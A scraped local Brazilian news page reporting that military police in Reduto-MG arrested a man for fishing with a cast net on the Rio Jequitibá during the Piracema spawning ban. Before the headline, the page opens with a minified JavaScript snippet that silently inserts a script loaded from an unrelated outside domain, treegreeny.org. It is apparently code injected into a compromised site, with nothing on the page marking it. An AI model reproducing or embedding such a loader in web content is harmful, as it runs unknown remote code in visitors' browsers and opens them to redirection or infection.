;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PM de Reduto apreende pesca irregular durante Piracema. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

PM de Reduto apreende pesca irregular durante Piracema.

Guarnição composta pelo Soldado Ronald e Soldado Duarte, receberam denúncia de que um cidadão conhecido por “Betinho”, estaria utilizando o instrumento “tarrafa” para pescar peixes no curso do Rio Jequitibá, situado na zona rural de Reduto-MG.
Imediatamente os militares deslocaram para o local, sendo localizado o pescador denunciado saindo do acesso ao rio, ainda com as roupas encharcadas e portando uma mochila.
Durante realização de busca, foi localizado dentro da referida mochila, uma tarrafa e diversos exemplares de peixes, alguns muito pequenos, de espécies conhecidas popularmente como “cascudo”, “piau”, “lambari”, “traíra” e “acara”, tendo o abordado confessado que os pescou utilizando a tarrafa localizada. Foi acionado via rede rádio/COPOM apoio da Polícia Ambiental, tendo apoiado a PM de Reduto o sr. Sgt Edigar e Sd Leandro, os quais confirmaram o flagrante de crime ambiental, sendo dada voz de prisão ao cidadão C. A. S..
Diante dos fatos, o material apreendido e o autor foram conduzidos a Delegacia de Polícia Civil em Manhuaçu, onde o registro prosseguirá para Inquérito Policial.
A PM de Reduto agradece a denúncia realizada por um morador da zona rural e, orienta a todos os cidadãos a denunciarem a Polícia Militar através do telefone 190 ou em Reduto no 33 8453-3555 quaisquer eventos relacionados a Segurança Pública.

Informação e fotos: Felipe Duarte

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.